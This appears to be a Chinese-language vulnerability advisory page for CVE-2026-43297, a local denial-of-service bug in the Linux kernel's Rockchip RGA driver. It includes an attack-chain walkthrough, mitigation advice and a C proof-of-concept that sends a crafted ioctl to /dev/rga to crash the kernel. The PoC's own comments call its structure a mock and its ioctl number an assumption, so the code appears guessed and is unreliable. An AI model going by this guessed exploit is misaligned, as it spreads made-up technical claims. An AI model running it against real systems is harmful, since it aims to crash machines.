CVE-2026-43297 CVSS 5.5 中危

Linux内核Rockchip RGA空指针解引用漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43297

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的Rockchip RGA驱动程序存在安全漏洞。在rga_buf_init()函数中，未对rga_get_frame()的返回值进行错误检查。当缓冲区类型不支持或无效时，rga_get_frame()返回错误指针，但rga_buf_init()直接对该指针进行解引用操作，可能导致系统崩溃或内核不稳定。

技术细节

该漏洞位于Linux内核的drivers/media/platform/rockchip/rga/rga.c文件中。函数rga_get_frame()在遇到不支持的缓冲区类型时会返回ERR_PTR(-EINVAL)。然而，调用它的rga_buf_init()函数假设返回值总是有效的指针，并未使用IS_ERR()宏进行校验，直接通过返回指针访问f->size成员。由于攻击向量为本地（AV:L）且权限要求低（PR:L），本地攻击者可通过发送特制的IOCTL请求触发该逻辑缺陷。由于解引用了无效的内核地址，这将触发内核异常，导致系统拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获取本地系统的低权限访问权限（PR:L）。

STEP 2

步骤2

攻击者打开Rockchip RGA设备文件（通常为/dev/rga）。

STEP 3

步骤3

攻击者构造包含无效缓冲区类型的特制数据结构，并通过IOCTL发送给内核。

STEP 4

步骤4

内核在rga_buf_init函数中处理请求，未检查rga_get_frame返回的ERROR_PTR，导致内核态空指针解引用。

STEP 5

步骤5

系统触发内核异常（Oops或Panic），导致重启或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// Mock structure based on typical RGA driver interaction
struct rga_buffer {
    unsigned long size;
    int format; // Setting an invalid format triggers the bug
};

#define RGA_IOC_MAGIC 'R'
// Assuming an IOCTL number that triggers rga_buf_init
#define RGA_SET_BUFFER _IOW(RGA_IOC_MAGIC, 0x01, struct rga_buffer)

int main() {
    int fd = open("/dev/rga", O_RDWR);
    if (fd < 0) {
        perror("Failed to open /dev/rga");
        return 1;
    }

    struct rga_buffer buf;
    buf.format = 0xDEADBEEF; // Invalid buffer type to force ERR_PTR return
    buf.size = 0;

    // Trigger the vulnerability: rga_buf_init -> rga_get_frame -> ERR_PTR dereference
    printf("[+] Attempting to trigger CVE-2026-43297...\n");
    if (ioctl(fd, RGA_SET_BUFFER, &buf) < 0) {
        perror("IOCTL failed (Kernel might have crashed)");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (Versions prior to fix)

Commit: 1af2853b4e97fd95262fdef311b2334337069bc9

Commit: 5da29ade540b51763b950987bd410add7edaf3d1

Commit: 81f8e0e6a2e115df9274d0289779f8fca694479c

Commit: aa22221c5dc695a3d479e1e1b63f0c0e9eb29dbf

防御指南

临时缓解措施

如果无法立即升级内核，可以通过禁用Rockchip RGA内核模块（modprobe -r rga）或严格限制/dev/rga设备文件的访问权限（仅允许受信任的用户访问）来缓解风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表